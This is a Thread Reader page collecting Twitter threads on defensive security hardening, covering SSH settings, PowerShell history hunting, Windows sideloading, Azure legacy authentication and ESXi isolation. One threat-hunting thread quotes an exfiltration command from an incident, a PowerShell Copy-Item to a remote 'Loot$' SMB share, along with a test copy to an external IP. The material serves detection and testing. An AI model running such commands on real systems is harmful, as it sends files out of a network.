Discover and read the best of Twitter Threads about #Hardening

Most recents (8)

1/ #Linux #Hardening

What's your take on setting the value "HashKnownHosts" to yes inside the SSH configuration so that entries in the known_hosts file are hashed? 🧵

#CyberSecurity
2/ Yes, an attacker might find clues about other hosts in the network elsewhere (logs/history files), and yes, a TA can probably crack the hashes relatively quickly with hashcat. [1]
3/ But I would probably vote to enable this setting at the end of the day. You?

Reference:
[1] github.com/chris408/known…
Read 3 tweets
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the
-Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
Read 4 tweets
/1 #Hardening:

@0xdf_ finds credentials in the ConsoleHost_history.txt file in the latest walkthrough of the #HTB machine Timelapse. [1]

In our Compromise Assessments, we regularly audit the PowerShell history to find (stored) credentials in this file. 🧵

#CyberSecurity
2/ Hunting for credentials in the PowerShell history is quickly done with @Velocidex Velociraptor.

We can get the file's entire content from the hosts or search specifically for keywords within the file.
3/ The content of this file (the PowerShell history), is not only interesting for searching stored credentials in it but also an excellent forensic artifact.

In the case of a CA, we can specifically search for (older) traces of TAs (Invoke-commands, downloading of tools/code..)
Read 6 tweets
1/ #Hardening:

If the Windows App sideloading feature is enabled, users can also install APPX packages not originating not from the Microsoft Store, ideal for distributing malware with these packages 🤯[1],[2]

🧵 #CyberSecurity
2/ We can search our network for systems with enabled sideloading:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock".
3/
AllowAllTrustedApps:

This value can also be set via GPO if a company wants to distribute trusted line-of-business (LOB) apps that are not from the Windows Store.

However, these apps must still have a valid certificate chain; otherwise, the app will not be loaded.
Read 5 tweets
1/ Linux #Hardening and #ThreatHunting

The screenshot below is from Microsoft [1] - using XorDdos as an example, we can learn a lot about Linux forensics and hardening. 🧵

#CyberSecurity
2/ XorDdos bruteforces (root) access via SSH.

Learning: Prevent logging in via SSH with passwords (use priv/pub keys instead).

Within the SSH config (/etc/ssh/sshd_config), modify at least the following two lines:

PermitRootLogin no
PasswordAuthentication no
3/ SSH can, of course, be secured in much more detail.

DigitalOcean has put together an excellent guide on this topic:

digitalocean.com/community/tuto…
Read 25 tweets
The Most Important PVC in Zero Trust Architecture is People, Also Required for ZTA is the PAM Module in SecHard!

People are one of the most important circle in data security. Research also shows that the vast majority of data leaks result from abuse of employee privileges.
What Threats Might Occur?

Due to the difficulty of identity management, many different types of threats can arise ranging from espionage to ransomware.
Can SecHard Prevent Privilege Abuse?

Unlike a traditional PAM product, SecHard offers a PAM solution that integrates with other PVC areas recommended by the ZTA.
Read 5 tweets
1/ #Azure #Hardening Tip #5: Legacy authentication to bypass MFA in Azure AD

"One of the most common methods used by attackers to gain access to Azure tenants is credential theft or password spraying with legacy authentication protocols. Legacy authentication protocols
2/ do not support MFA and (if enabled) can be used to gain access to hosted data and resources via Azure AD."

☝️Quote from the M-Trends 2022 Report.

A few weeks ago, I created a presentation titled "Attack target Azure", where these two points are also outlined as the most
3/ common methods (used by attackers) into Azure Tenants.

To better secure Azure Tenants, I recommend creating an evaluation of the applications that still use legacy authentication protocols. The use of these protocols should be prevented with Conditional Access Policies (CAP).
Read 6 tweets
1/ #Hardening: More and more attackers in ransomware cases are attacking the ESXi and vCenter infrastructure to encrypt a large part of the systems in a company within a short time.
2/ Once an attacker has gained access to a network, the captured credentials are used for logging into the vCenter infrastructure.

Removing ESXi and vCenter from Active Directory prevents compromised Active Directory accounts from being used to authenticate directly to the
3/ virtualization infrastructure. Authentication would need to happen directly on the relevant systems, and administrators must have dedicated accounts for logging in. These measures cannot prevent compromise but at least make it more
Read 4 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!